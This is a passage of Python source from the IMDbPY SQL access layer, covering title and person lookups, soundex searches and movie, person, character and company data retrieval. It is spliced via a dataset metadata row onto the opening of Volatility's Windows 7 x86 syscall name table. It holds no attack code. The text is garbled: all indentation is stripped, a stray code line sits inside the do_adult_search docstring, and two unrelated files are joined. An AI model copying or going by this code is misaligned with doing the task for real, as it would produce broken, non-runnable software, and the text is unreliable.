for e in cs_info:
# excludes some strings that clearly are not encoding.
if e in ('script', '', 'cyrillic', 'greek'): continue
if e.startswith('iso-') and e.find('latin') != -1:
e = e[4:].replace('-', '')
try:
lookup(e)
lat1 = akatitle.encode('latin_1', 'replace')
return unicode(lat1, e, 'replace')
except (LookupError, ValueError, TypeError):
continue
return None
def _buildNULLCondition(self, col, val):
"""Build a comparison for columns where values can be NULL."""
if val is None:
return ISNULL(col)
else:
if isinstance(val, (int, long)):
return col == val
else:
return col == self.toUTF8(val)
def _getTitleID(self, title):
"""Given a long imdb canonical title, returns a movieID or
None if not found."""
td = analyze_title(title)
condition = None
if td['kind'] == 'episode':
epof = td['episode of']
seriesID = [s.id for s in Title.select(
AND(Title.q.title == self.toUTF8(epof['title']),
self._buildNULLCondition(Title.q.imdbIndex,
epof.get('imdbIndex')),
Title.q.kindID == self._kindRev[epof['kind']],
self._buildNULLCondition(Title.q.productionYear,
epof.get('year'))))]
if seriesID:
condition = AND(IN(Title.q.episodeOfID, seriesID),
Title.q.title == self.toUTF8(td['title']),
self._buildNULLCondition(Title.q.imdbIndex,
td.get('imdbIndex')),
Title.q.kindID == self._kindRev[td['kind']],
self._buildNULLCondition(Title.q.productionYear,
td.get('year')))
if condition is None:
condition = AND(Title.q.title == self.toUTF8(td['title']),
self._buildNULLCondition(Title.q.imdbIndex,
td.get('imdbIndex')),
Title.q.kindID == self._kindRev[td['kind']],
self._buildNULLCondition(Title.q.productionYear,
td.get('year')))
res = Title.select(condition)
try:
if res.count() != 1:
return None
except (UnicodeDecodeError, TypeError):
return None
return res[0].id
def _getNameID(self, name):
"""Given a long imdb canonical name, returns a personID or
None if not found."""
nd = analyze_name(name)
res = Name.select(AND(Name.q.name == self.toUTF8(nd['name']),
self._buildNULLCondition(Name.q.imdbIndex,
nd.get('imdbIndex'))))
try:
c = res.count()
if res.count() != 1:
return None
except (UnicodeDecodeError, TypeError):
return None
return res[0].id
def _normalize_movieID(self, movieID):
"""Normalize the given movieID."""
try:
return int(movieID)
except (ValueError, OverflowError):
raise IMDbError('movieID "%s" can\'t be converted to integer' % \
movieID)
def _normalize_personID(self, personID):
"""Normalize the given personID."""
try:
return int(personID)
except (ValueError, OverflowError):
raise IMDbError('personID "%s" can\'t be converted to integer' % \
personID)
def _normalize_characterID(self, characterID):
"""Normalize the given characterID."""
try:
return int(characterID)
except (ValueError, OverflowError):
raise IMDbError('characterID "%s" can\'t be converted to integer' \
% characterID)
def _normalize_companyID(self, companyID):
"""Normalize the given companyID."""
try:
return int(companyID)
except (ValueError, OverflowError):
raise IMDbError('companyID "%s" can\'t be converted to integer' \
% companyID)
def get_imdbMovieID(self, movieID):
"""Translate a movieID in an imdbID.
If not in the database, try an Exact Primary Title search on IMDb;
return None if it's unable to get the imdbID.
"""
try: movie = Title.get(movieID)
except NotFoundError: return None
imdbID = movie.imdbID
if imdbID is not None: return '%07d' % imdbID
m_dict = get_movie_data(movie.id, self._kind)
titline = build_title(m_dict, ptdf=0)
imdbID = self.title2imdbID(titline, m_dict['kind'])
# If the imdbID was retrieved from the web and was not in the
# database, update the database (ignoring errors, because it's
# possibile that the current user has not update privileges).
# There're times when I think I'm a genius; this one of
# those times... <g>
if imdbID is not None and not isinstance(imdbID, list):
try: movie.imdbID = int(imdbID)
except: pass
return imdbID
def get_imdbPersonID(self, personID):
"""Translate a personID in an imdbID.
If not in the database, try an Exact Primary Name search on IMDb;
return None if it's unable to get the imdbID.
"""
try: person = Name.get(personID)
except NotFoundError: return None
imdbID = person.imdbID
if imdbID is not None: return '%07d' % imdbID
n_dict = {'name': person.name, 'imdbIndex': person.imdbIndex}
namline = build_name(n_dict, canonical=False)
imdbID = self.name2imdbID(namline)
if imdbID is not None and not isinstance(imdbID, list):
try: person.imdbID = int(imdbID)
except: pass
return imdbID
def get_imdbCharacterID(self, characterID):
"""Translate a characterID in an imdbID.
If not in the database, try an Exact Primary Name search on IMDb;
return None if it's unable to get the imdbID.
"""
try: character = CharName.get(characterID)
except NotFoundError: return None
imdbID = character.imdbID
if imdbID is not None: return '%07d' % imdbID
n_dict = {'name': character.name, 'imdbIndex': character.imdbIndex}
namline = build_name(n_dict, canonical=False)
imdbID = self.character2imdbID(namline)
if imdbID is not None and not isinstance(imdbID, list):
try: character.imdbID = int(imdbID)
except: pass
return imdbID
def get_imdbCompanyID(self, companyID):
"""Translate a companyID in an imdbID.
If not in the database, try an Exact Primary Name search on IMDb;
return None if it's unable to get the imdbID.
"""
try: company = CompanyName.get(companyID)
except NotFoundError: return None
imdbID = company.imdbID
if imdbID is not None: return '%07d' % imdbID
n_dict = {'name': company.name, 'country': company.countryCode}
namline = build_company_name(n_dict)
imdbID = self.company2imdbID(namline)
if imdbID is not None and not isinstance(imdbID, list):
try: company.imdbID = int(imdbID)
except: pass
return imdbID
def do_adult_search(self, doAdult):
"""If set to 0 or False, movies in the Adult category are not
episodeOf = title_dict.get('episode of')
shown in the results of a search."""
self.doAdult = doAdult
def _search_movie(self, title, results, _episodes=False):
title = title.strip()
if not title: return []
title_dict = analyze_title(title, canonical=1)
s_title = title_dict['title']
if not s_title: return []
episodeOf = title_dict.get('episode of')
if episodeOf:
_episodes = False
s_title_split = s_title.split(', ')
if len(s_title_split) > 1 and \
s_title_split[-1].lower() in _unicodeArticles:
s_title_rebuilt = ', '.join(s_title_split[:-1])
if s_title_rebuilt:
s_title = s_title_rebuilt
#if not episodeOf:
# if not _episodes:
# s_title_split = s_title.split(', ')
# if len(s_title_split) > 1 and \
# s_title_split[-1].lower() in _articles:
# s_title_rebuilt = ', '.join(s_title_split[:-1])
# if s_title_rebuilt:
# s_title = s_title_rebuilt
#else:
# _episodes = False
if isinstance(s_title, unicode):
s_title = s_title.encode('ascii', 'ignore')
soundexCode = soundex(s_title)
# XXX: improve the search restricting the kindID if the
# "kind" of the input differs from "movie"?
condition = conditionAka = None
if _episodes:
condition = AND(Title.q.phoneticCode == soundexCode,
Title.q.kindID == self._kindRev['episode'])
conditionAka = AND(AkaTitle.q.phoneticCode == soundexCode,
AkaTitle.q.kindID == self._kindRev['episode'])
elif title_dict['kind'] == 'episode' and episodeOf is not None:
# set canonical=0 ? Should not make much difference.
series_title = build_title(episodeOf, canonical=1)
# XXX: is it safe to get "results" results?
# Too many? Too few?
serRes = results
if serRes < 3 or serRes > 10:
serRes = 10
searchSeries = self._search_movie(series_title, serRes)
seriesIDs = [result[0] for result in searchSeries]
if seriesIDs:
condition = AND(Title.q.phoneticCode == soundexCode,
IN(Title.q.episodeOfID, seriesIDs),
Title.q.kindID == self._kindRev['episode'])
conditionAka = AND(AkaTitle.q.phoneticCode == soundexCode,
IN(AkaTitle.q.episodeOfID, seriesIDs),
AkaTitle.q.kindID == self._kindRev['episode'])
else:
# XXX: bad situation: we have found no matching series;
# try searching everything (both episodes and
# non-episodes) for the title.
condition = AND(Title.q.phoneticCode == soundexCode,
IN(Title.q.episodeOfID, seriesIDs))
conditionAka = AND(AkaTitle.q.phoneticCode == soundexCode,
IN(AkaTitle.q.episodeOfID, seriesIDs))
if condition is None:
# XXX: excludes episodes?
condition = AND(Title.q.kindID != self._kindRev['episode'],
Title.q.phoneticCode == soundexCode)
conditionAka = AND(AkaTitle.q.kindID != self._kindRev['episode'],
AkaTitle.q.phoneticCode == soundexCode)
# Up to 3 variations of the title are searched, plus the
# long imdb canonical title, if provided.
if not _episodes:
title1, title2, title3 = titleVariations(title)
else:
title1 = title
title2 = ''
title3 = ''
try:
qr = [(q.id, get_movie_data(q.id, self._kind))
for q in Title.select(condition)]
q2 = [(q.movieID, get_movie_data(q.id, self._kind, fromAka=1))
for q in AkaTitle.select(conditionAka)]
qr += q2
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to search the database: "%s"' % str(e))
resultsST = results * 3
res = scan_titles(qr, title1, title2, title3, resultsST,
searchingEpisode=episodeOf is not None,
onlyEpisodes=_episodes,
ro_thresold=0.0)
res[:] = [x[1] for x in res]
if res and not self.doAdult:
mids = [x[0] for x in res]
genreID = self._infoRev['genres']
adultlist = [al.movieID for al
in MovieInfo.select(
AND(MovieInfo.q.infoTypeID == genreID,
MovieInfo.q.info == 'Adult',
IN(MovieInfo.q.movieID, mids)))]
res[:] = [x for x in res if x[0] not in adultlist]
new_res = []
# XXX: can there be duplicates?
for r in res:
if r not in q2:
new_res.append(r)
continue
mdict = r[1]
aka_title = build_title(mdict, ptdf=1)
orig_dict = get_movie_data(r[0], self._kind)
orig_title = build_title(orig_dict, ptdf=1)
if aka_title == orig_title:
new_res.append(r)
continue
orig_dict['akas'] = [aka_title]
new_res.append((r[0], orig_dict))
if results > 0: new_res[:] = new_res[:results]
return new_res
def _search_episode(self, title, results):
return self._search_movie(title, results, _episodes=True)
def get_movie_main(self, movieID):
# Every movie information is retrieved from here.
infosets = self.get_movie_infoset()
try:
res = get_movie_data(movieID, self._kind)
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to get movieID "%s": "%s"' % (movieID, str(e)))
if not res:
raise IMDbDataAccessError('unable to get movieID "%s"' % movieID)
# Collect cast information.
castdata = [[cd.personID, cd.personRoleID, cd.note, cd.nrOrder,
self._role[cd.roleID]]
for cd in CastInfo.select(CastInfo.q.movieID == movieID)]
for p in castdata:
person = Name.get(p[0])
p += [person.name, person.imdbIndex]
if p[4] in ('actor', 'actress'):
p[4] = 'cast'
# Regroup by role/duty (cast, writer, director, ...)
castdata[:] = _groupListBy(castdata, 4)
for group in castdata:
duty = group[0][4]
for pdata in group:
curRole = pdata[1]
curRoleID = None
if curRole is not None:
robj = CharName.get(curRole)
curRole = robj.name
curRoleID = robj.id
p = Person(personID=pdata[0], name=pdata[5],
currentRole=curRole or u'',
roleID=curRoleID,
notes=pdata[2] or u'',
accessSystem='sql')
if pdata[6]: p['imdbIndex'] = pdata[6]
p.billingPos = pdata[3]
res.setdefault(duty, []).append(p)
if duty == 'cast':
res[duty] = merge_roles(res[duty])
res[duty].sort()
# Info about the movie.
minfo = [(self._info[m.infoTypeID], m.info, m.note)
for m in MovieInfo.select(MovieInfo.q.movieID == movieID)]
minfo += [(self._info[m.infoTypeID], m.info, m.note)
for m in MovieInfoIdx.select(MovieInfoIdx.q.movieID == movieID)]
minfo += [('keywords', Keyword.get(m.keywordID).keyword, None)
for m in MovieKeyword.select(MovieKeyword.q.movieID == movieID)]
minfo = _groupListBy(minfo, 0)
for group in minfo:
sect = group[0][0]
for mdata in group:
data = mdata[1]
if mdata[2]: data += '::%s' % mdata[2]
res.setdefault(sect, []).append(data)
# Companies info about a movie.
cinfo = [(self._compType[m.companyTypeID], m.companyID, m.note) for m
in MovieCompanies.select(MovieCompanies.q.movieID == movieID)]
cinfo = _groupListBy(cinfo, 0)
for group in cinfo:
sect = group[0][0]
for mdata in group:
cDb = CompanyName.get(mdata[1])
cDbTxt = cDb.name
if cDb.countryCode:
cDbTxt += ' %s' % cDb.countryCode
company = Company(name=cDbTxt,
companyID=mdata[1],
notes=mdata[2] or u'',
accessSystem=self.accessSystem)
res.setdefault(sect, []).append(company)
# AKA titles.
akat = [(get_movie_data(at.id, self._kind, fromAka=1), at.note)
for at in AkaTitle.select(AkaTitle.q.movieID == movieID)]
if akat:
res['akas'] = []
for td, note in akat:
nt = build_title(td, ptdf=1)
if note:
net = self._changeAKAencoding(note, nt)
if net is not None: nt = net
nt += '::%s' % note
if nt not in res['akas']: res['akas'].append(nt)
# Complete cast/crew.
compcast = [(self._compcast[cc.subjectID], self._compcast[cc.statusID])
for cc in CompleteCast.select(CompleteCast.q.movieID == movieID)]
if compcast:
for entry in compcast:
val = unicode(entry[1])
res[u'complete %s' % entry[0]] = val
# Movie connections.
mlinks = [[ml.linkedMovieID, self._link[ml.linkTypeID]]
for ml in MovieLink.select(MovieLink.q.movieID == movieID)]
if mlinks:
for ml in mlinks:
lmovieData = get_movie_data(ml[0], self._kind)
if lmovieData:
m = Movie(movieID=ml[0], data=lmovieData, accessSystem='sql')
ml[0] = m
res['connections'] = {}
mlinks[:] = _groupListBy(mlinks, 1)
for group in mlinks:
lt = group[0][1]
res['connections'][lt] = [i[0] for i in group]
# Episodes.
episodes = {}
eps_list = list(Title.select(Title.q.episodeOfID == movieID))
eps_list.sort()
if eps_list:
ps_data = {'title': res['title'], 'kind': res['kind'],
'year': res.get('year'),
'imdbIndex': res.get('imdbIndex')}
parentSeries = Movie(movieID=movieID, data=ps_data,
accessSystem='sql')
for episode in eps_list:
episodeID = episode.id
episode_data = get_movie_data(episodeID, self._kind)
m = Movie(movieID=episodeID, data=episode_data,
accessSystem='sql')
m['episode of'] = parentSeries
season = episode_data.get('season', 'UNKNOWN')
if season not in episodes: episodes[season] = {}
ep_number = episode_data.get('episode')
if ep_number is None:
ep_number = max((episodes[season].keys() or [0])) + 1
episodes[season][ep_number] = m
res['episodes'] = episodes
res['number of episodes'] = sum([len(x) for x in episodes.values()])
res['number of seasons'] = len(episodes.keys())
# Regroup laserdisc information.
res = _reGroupDict(res, self._moviesubs)
# Do some transformation to preserve consistency with other
# data access systems.
if 'quotes' in res:
for idx, quote in enumerate(res['quotes']):
res['quotes'][idx] = quote.split('::')
if 'runtimes' in res and len(res['runtimes']) > 0:
rt = res['runtimes'][0]
episodes = re_episodes.findall(rt)
if episodes:
res['runtimes'][0] = re_episodes.sub('', rt)
if res['runtimes'][0][-2:] == '::':
res['runtimes'][0] = res['runtimes'][0][:-2]
if 'votes' in res:
res['votes'] = int(res['votes'][0])
if 'rating' in res:
res['rating'] = float(res['rating'][0])
if 'votes distribution' in res:
res['votes distribution'] = res['votes distribution'][0]
if 'mpaa' in res:
res['mpaa'] = res['mpaa'][0]
if 'top 250 rank' in res:
try: res['top 250 rank'] = int(res['top 250 rank'])
except: pass
if 'bottom 10 rank' in res:
try: res['bottom 100 rank'] = int(res['bottom 10 rank'])
except: pass
del res['bottom 10 rank']
for old, new in [('guest', 'guests'), ('trademarks', 'trade-mark'),
('articles', 'article'), ('pictorials', 'pictorial'),
('magazine-covers', 'magazine-cover-photo')]:
if old in res:
res[new] = res[old]
del res[old]
trefs,nrefs = {}, {}
trefs,nrefs = self._extractRefs(sub_dict(res,Movie.keys_tomodify_list))
return {'data': res, 'titlesRefs': trefs, 'namesRefs': nrefs,
'info sets': infosets}
# Just to know what kind of information are available.
get_movie_alternate_versions = get_movie_main
get_movie_business = get_movie_main
get_movie_connections = get_movie_main
get_movie_crazy_credits = get_movie_main
get_movie_goofs = get_movie_main
get_movie_keywords = get_movie_main
get_movie_literature = get_movie_main
get_movie_locations = get_movie_main
get_movie_plot = get_movie_main
get_movie_quotes = get_movie_main
get_movie_release_dates = get_movie_main
get_movie_soundtrack = get_movie_main
get_movie_taglines = get_movie_main
get_movie_technical = get_movie_main
get_movie_trivia = get_movie_main
get_movie_vote_details = get_movie_main
get_movie_episodes = get_movie_main
def _search_person(self, name, results):
name = name.strip()
if not name: return []
s_name = analyze_name(name)['name']
if not s_name: return []
if isinstance(s_name, unicode):
s_name = s_name.encode('ascii', 'ignore')
soundexCode = soundex(s_name)
name1, name2, name3 = nameVariations(name)
# If the soundex is None, compare only with the first
# phoneticCode column.
if soundexCode is not None:
condition = IN(soundexCode, [Name.q.namePcodeCf,
Name.q.namePcodeNf,
Name.q.surnamePcode])
conditionAka = IN(soundexCode, [AkaName.q.namePcodeCf,
AkaName.q.namePcodeNf,
AkaName.q.surnamePcode])
else:
condition = ISNULL(Name.q.namePcodeCf)
conditionAka = ISNULL(AkaName.q.namePcodeCf)
try:
qr = [(q.id, {'name': q.name, 'imdbIndex': q.imdbIndex})
for q in Name.select(condition)]
q2 = [(q.personID, {'name': q.name, 'imdbIndex': q.imdbIndex})
for q in AkaName.select(conditionAka)]
qr += q2
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to search the database: "%s"' % str(e))
res = scan_names(qr, name1, name2, name3, results)
res[:] = [x[1] for x in res]
# Purge empty imdbIndex.
returnl = []
for x in res:
tmpd = x[1]
if tmpd['imdbIndex'] is None:
del tmpd['imdbIndex']
returnl.append((x[0], tmpd))
new_res = []
# XXX: can there be duplicates?
for r in returnl:
if r not in q2:
new_res.append(r)
continue
pdict = r[1]
aka_name = build_name(pdict, canonical=1)
p = Name.get(r[0])
orig_dict = {'name': p.name, 'imdbIndex': p.imdbIndex}
if orig_dict['imdbIndex'] is None:
del orig_dict['imdbIndex']
orig_name = build_name(orig_dict, canonical=1)
if aka_name == orig_name:
new_res.append(r)
continue
orig_dict['akas'] = [aka_name]
new_res.append((r[0], orig_dict))
if results > 0: new_res[:] = new_res[:results]
return new_res
def get_person_main(self, personID):
# Every person information is retrieved from here.
infosets = self.get_person_infoset()
try:
p = Name.get(personID)
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to get personID "%s": "%s"' % (personID, str(e)))
res = {'name': p.name, 'imdbIndex': p.imdbIndex}
if res['imdbIndex'] is None: del res['imdbIndex']
if not res:
raise IMDbDataAccessError('unable to get personID "%s"' % personID)
# Collect cast information.
castdata = [(cd.movieID, cd.personRoleID, cd.note,
self._role[cd.roleID],
get_movie_data(cd.movieID, self._kind))
for cd in CastInfo.select(CastInfo.q.personID == personID)]
# Regroup by role/duty (cast, writer, director, ...)
castdata[:] = _groupListBy(castdata, 3)
episodes = {}
seenDuties = []
for group in castdata:
for mdata in group:
duty = orig_duty = group[0][3]
if duty not in seenDuties: seenDuties.append(orig_duty)
note = mdata[2] or u''
if 'episode of' in mdata[4]:
duty = 'episodes'
if orig_duty not in ('actor', 'actress'):
if note: note = ' %s' % note
note = '[%s]%s' % (orig_duty, note)
curRole = mdata[1]
curRoleID = None
if curRole is not None:
robj = CharName.get(curRole)
curRole = robj.name
curRoleID = robj.id
m = Movie(movieID=mdata[0], data=mdata[4],
currentRole=curRole or u'',
roleID=curRoleID,
notes=note, accessSystem='sql')
if duty != 'episodes':
res.setdefault(duty, []).append(m)
else:
episodes.setdefault(m['episode of'], []).append(m)
if episodes:
for k in episodes:
episodes[k].sort()
episodes[k].reverse()
res['episodes'] = episodes
for duty in seenDuties:
if duty in res:
if duty in ('actor', 'actress', 'himself', 'herself',
'themselves'):
res[duty] = merge_roles(res[duty])
res[duty].sort()
# Info about the person.
pinfo = [(self._info[pi.infoTypeID], pi.info, pi.note)
for pi in PersonInfo.select(PersonInfo.q.personID == personID)]
# Regroup by duty.
pinfo = _groupListBy(pinfo, 0)
for group in pinfo:
sect = group[0][0]
for pdata in group:
data = pdata[1]
if pdata[2]: data += '::%s' % pdata[2]
res.setdefault(sect, []).append(data)
# AKA names.
akan = [(an.name, an.imdbIndex)
for an in AkaName.select(AkaName.q.personID == personID)]
if akan:
res['akas'] = []
for n in akan:
nd = {'name': n[0]}
if n[1]: nd['imdbIndex'] = n[1]
nt = build_name(nd, canonical=1)
res['akas'].append(nt)
# Do some transformation to preserve consistency with other
# data access systems.
for key in ('birth date', 'birth notes', 'death date', 'death notes',
'birth name', 'height'):
if key in res:
res[key] = res[key][0]
if 'guest' in res:
res['notable tv guest appearances'] = res['guest']
del res['guest']
miscnames = res.get('nick names', [])
if 'birth name' in res: miscnames.append(res['birth name'])
if 'akas' in res:
for mname in miscnames:
if mname in res['akas']: res['akas'].remove(mname)
if not res['akas']: del res['akas']
trefs,nrefs = self._extractRefs(sub_dict(res,Person.keys_tomodify_list))
return {'data': res, 'titlesRefs': trefs, 'namesRefs': nrefs,
'info sets': infosets}
# Just to know what kind of information are available.
get_person_filmography = get_person_main
get_person_biography = get_person_main
get_person_other_works = get_person_main
get_person_episodes = get_person_main
def _search_character(self, name, results):
name = name.strip()
if not name: return []
s_name = analyze_name(name)['name']
if not s_name: return []
if isinstance(s_name, unicode):
s_name = s_name.encode('ascii', 'ignore')
s_name = normalizeName(s_name)
soundexCode = soundex(s_name)
surname = s_name.split(' ')[-1]
surnameSoundex = soundex(surname)
name2 = ''
soundexName2 = None
nsplit = s_name.split()
if len(nsplit) > 1:
name2 = '%s %s' % (nsplit[-1], ' '.join(nsplit[:-1]))
if s_name == name2:
name2 = ''
else:
soundexName2 = soundex(name2)
# If the soundex is None, compare only with the first
# phoneticCode column.
if soundexCode is not None:
if soundexName2 is not None:
condition = OR(surnameSoundex == CharName.q.surnamePcode,
IN(CharName.q.namePcodeNf, [soundexCode,
soundexName2]),
IN(CharName.q.surnamePcode, [soundexCode,
soundexName2]))
else:
condition = OR(surnameSoundex == CharName.q.surnamePcode,
IN(soundexCode, [CharName.q.namePcodeNf,
CharName.q.surnamePcode]))
else:
condition = ISNULL(Name.q.namePcodeNf)
try:
qr = [(q.id, {'name': q.name, 'imdbIndex': q.imdbIndex})
for q in CharName.select(condition)]
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to search the database: "%s"' % str(e))
res = scan_names(qr, s_name, name2, '', results,
_scan_character=True)
res[:] = [x[1] for x in res]
# Purge empty imdbIndex.
returnl = []
for x in res:
tmpd = x[1]
if tmpd['imdbIndex'] is None:
del tmpd['imdbIndex']
returnl.append((x[0], tmpd))
return returnl
def get_character_main(self, characterID, results=1000):
# Every character information is retrieved from here.
infosets = self.get_character_infoset()
try:
c = CharName.get(characterID)
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to get characterID "%s": "%s"' % (characterID, e))
res = {'name': c.name, 'imdbIndex': c.imdbIndex}
if res['imdbIndex'] is None: del res['imdbIndex']
if not res:
raise IMDbDataAccessError('unable to get characterID "%s"' % \
characterID)
# Collect filmography information.
items = CastInfo.select(CastInfo.q.personRoleID == characterID)
if results > 0:
items = items[:results]
filmodata = [(cd.movieID, cd.personID, cd.note,
get_movie_data(cd.movieID, self._kind)) for cd in items
if self._role[cd.roleID] in ('actor', 'actress')]
fdata = []
for f in filmodata:
curRole = None
curRoleID = f[1]
note = f[2] or u''
if curRoleID is not None:
robj = Name.get(curRoleID)
curRole = robj.name
m = Movie(movieID=f[0], data=f[3],
currentRole=curRole or u'',
roleID=curRoleID, roleIsPerson=True,
notes=note, accessSystem='sql')
fdata.append(m)
fdata = merge_roles(fdata)
fdata.sort()
if fdata:
res['filmography'] = fdata
return {'data': res, 'info sets': infosets}
get_character_filmography = get_character_main
get_character_biography = get_character_main
def _search_company(self, name, results):
name = name.strip()
if not name: return []
if isinstance(name, unicode):
name = name.encode('ascii', 'ignore')
soundexCode = soundex(name)
# If the soundex is None, compare only with the first
# phoneticCode column.
if soundexCode is None:
condition = ISNULL(CompanyName.q.namePcodeNf)
else:
if name.endswith(']'):
condition = CompanyName.q.namePcodeSf == soundexCode
else:
condition = CompanyName.q.namePcodeNf == soundexCode
try:
qr = [(q.id, {'name': q.name, 'country': q.countryCode})
for q in CompanyName.select(condition)]
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to search the database: "%s"' % str(e))
qr[:] = [(x[0], build_company_name(x[1])) for x in qr]
res = scan_company_names(qr, name, results)
res[:] = [x[1] for x in res]
# Purge empty country keys.
returnl = []
for x in res:
tmpd = x[1]
country = tmpd.get('country')
if country is None and 'country' in tmpd:
del tmpd['country']
returnl.append((x[0], tmpd))
return returnl
def get_company_main(self, companyID, results=0):
# Every company information is retrieved from here.
infosets = self.get_company_infoset()
try:
c = CompanyName.get(companyID)
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to get companyID "%s": "%s"' % (companyID, e))
res = {'name': c.name, 'country': c.countryCode}
if res['country'] is None: del res['country']
if not res:
raise IMDbDataAccessError('unable to get companyID "%s"' % \
companyID)
# Collect filmography information.
items = MovieCompanies.select(MovieCompanies.q.companyID == companyID)
if results > 0:
items = items[:results]
filmodata = [(cd.movieID, cd.companyID,
self._compType[cd.companyTypeID], cd.note,
get_movie_data(cd.movieID, self._kind)) for cd in items]
filmodata = _groupListBy(filmodata, 2)
for group in filmodata:
ctype = group[0][2]
for movieID, companyID, ctype, note, movieData in group:
movie = Movie(data=movieData, movieID=movieID,
notes=note or u'', accessSystem=self.accessSystem)
res.setdefault(ctype, []).append(movie)
res.get(ctype, []).sort()
return {'data': res, 'info sets': infosets}
def _search_keyword(self, keyword, results):
constr = OR(Keyword.q.phoneticCode ==
soundex(keyword.encode('ascii', 'ignore')),
CONTAINSSTRING(Keyword.q.keyword, self.toUTF8(keyword)))
return filterSimilarKeywords(keyword,
_iterKeywords(Keyword.select(constr)))[:results]
def _get_keyword(self, keyword, results):
keyID = Keyword.select(Keyword.q.keyword == keyword)
if keyID.count() == 0:
return []
keyID = keyID[0].id
movies = MovieKeyword.select(MovieKeyword.q.keywordID ==
keyID)[:results]
return [(m.movieID, get_movie_data(m.movieID, self._kind))
for m in movies]
def _get_top_bottom_movies(self, kind):
if kind == 'top':
kind = 'top 250 rank'
elif kind == 'bottom':
# Not a refuse: the plain text data files contains only
# the bottom 10 movies.
kind = 'bottom 10 rank'
else:
return []
infoID = InfoType.select(InfoType.q.info == kind)
if infoID.count() == 0:
return []
infoID = infoID[0].id
movies = MovieInfoIdx.select(MovieInfoIdx.q.infoTypeID == infoID)
ml = []
for m in movies:
minfo = get_movie_data(m.movieID, self._kind)
for k in kind, 'votes', 'rating', 'votes distribution':
valueDict = getSingleInfo(MovieInfoIdx, m.movieID,
k, notAList=True)
if k in (kind, 'votes') and k in valueDict:
valueDict[k] = int(valueDict[k])
elif k == 'rating' and k in valueDict:
valueDict[k] = float(valueDict[k])
minfo.update(valueDict)
ml.append((m.movieID, minfo))
sorter = (_cmpBottom, _cmpTop)[kind == 'top 250 rank']
ml.sort(sorter)
return ml
def __del__(self):
"""Ensure that the connection is closed."""
if not hasattr(self, '_connection'): return
self._sql_logger.debug('closing connection to the database')
self._connection.close()
| gpl-3.0 |
cakeboss893/volatility | volatility/plugins/overlays/windows/win7_sp01_x86_syscalls.py | 58 | 45962 | # Volatility
# Copyright (c) 2008-2013 Volatility Foundation
# Copyright (c) 2011 Michael Hale Ligh <michael.hale@gmail.com>
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
syscalls = [
[
'NtAcceptConnectPort', # 0x0
'NtAccessCheck', # 0x1
'NtAccessCheckAndAuditAlarm', # 0x2
'NtAccessCheckByType', # 0x3
'NtAccessCheckByTypeAndAuditAlarm', # 0x4
'NtAccessCheckByTypeResultList', # 0x5
'NtAccessCheckByTypeResultListAndAuditAlarm', # 0x6
'NtAccessCheckByTypeResultListAndAuditAlarmByHandle', # 0x7
'NtAddAtom', # 0x8
'NtAddBootEntry', # 0x9
'NtAddDriverEntry', # 0xa
'NtAdjustGroupsToken', # 0xb
'NtAdjustPrivilegesToken', # 0xc
'NtAlertResumeThread', # 0xd
'NtAlertThread', # 0xe
'NtAllocateLocallyUniqueId', # 0xf
'NtAllocateReserveObject', # 0x10
'NtAllocateUserPhysicalPages', # 0x11
'NtAllocateUuids', # 0x12
'NtAllocateVirtualMemory', # 0x13
'NtAlpcAcceptConnectPort', # 0x14
'NtAlpcCancelMessage', # 0x15
'NtAlpcConnectPort', # 0x16
'NtAlpcCreatePort', # 0x17
'NtAlpcCreatePortSection', # 0x18
'NtAlpcCreateResourceReserve', # 0x19
'NtAlpcCreateSectionView', # 0x1a
'NtAlpcCreateSecurityContext', # 0x1b
'NtAlpcDeletePortSection', # 0x1c
'NtAlpcDeleteResourceReserve', # 0x1d
'NtAlpcDeleteSectionView', # 0x1e
'NtAlpcDeleteSecurityContext', # 0x1f
'NtAlpcDisconnectPort', # 0x20
'NtAlpcImpersonateClientOfPort', # 0x21
'NtAlpcOpenSenderProcess', # 0x22
'NtAlpcOpenSenderThread', # 0x23
'NtAlpcQueryInformation', # 0x24
'NtAlpcQueryInformationMessage', # 0x25
'NtAlpcRevokeSecurityContext', # 0x26
'NtAlpcSendWaitReceivePort', # 0x27
'NtAlpcSetInformation', # 0x28
'NtApphelpCacheControl', # 0x29
'NtAreMappedFilesTheSame', # 0x2a
'NtAssignProcessToJobObject', # 0x2b
'NtCallbackReturn', # 0x2c
'NtCancelIoFile', # 0x2d
'NtCancelIoFileEx', # 0x2e
'NtCancelSynchronousIoFile', # 0x2f
'NtCancelTimer', # 0x30
'NtClearEvent', # 0x31
'NtClose', # 0x32
'NtCloseObjectAuditAlarm', # 0x33
'NtCommitComplete', # 0x34
'NtCommitEnlistment', # 0x35
'NtCommitTransaction', # 0x36
'NtCompactKeys', # 0x37
'NtCompareTokens', # 0x38
'NtCompleteConnectPort', # 0x39
'NtCompressKey', # 0x3a
'NtConnectPort', # 0x3b
'NtContinue', # 0x3c
'NtCreateDebugObject', # 0x3d
'NtCreateDirectoryObject', # 0x3e
'NtCreateEnlistment', # 0x3f
'NtCreateEvent', # 0x40
'NtCreateEventPair', # 0x41
'NtCreateFile', # 0x42
'NtCreateIoCompletion', # 0x43
'NtCreateJobObject', # 0x44
'NtCreateJobSet', # 0x45
'NtCreateKey', # 0x46
'NtCreateKeyedEvent', # 0x47
'NtCreateKeyTransacted', # 0x48
'NtCreateMailslotFile', # 0x49
'NtCreateMutant', # 0x4a
'NtCreateNamedPipeFile', # 0x4b
'NtCreatePagingFile', # 0x4c
'NtCreatePort', # 0x4d
'NtCreatePrivateNamespace', # 0x4e
'NtCreateProcess', # 0x4f
'NtCreateProcessEx', # 0x50
'NtCreateProfile', # 0x51
'NtCreateProfileEx', # 0x52
'NtCreateResourceManager', # 0x53
'NtCreateSection', # 0x54
'NtCreateSemaphore', # 0x55
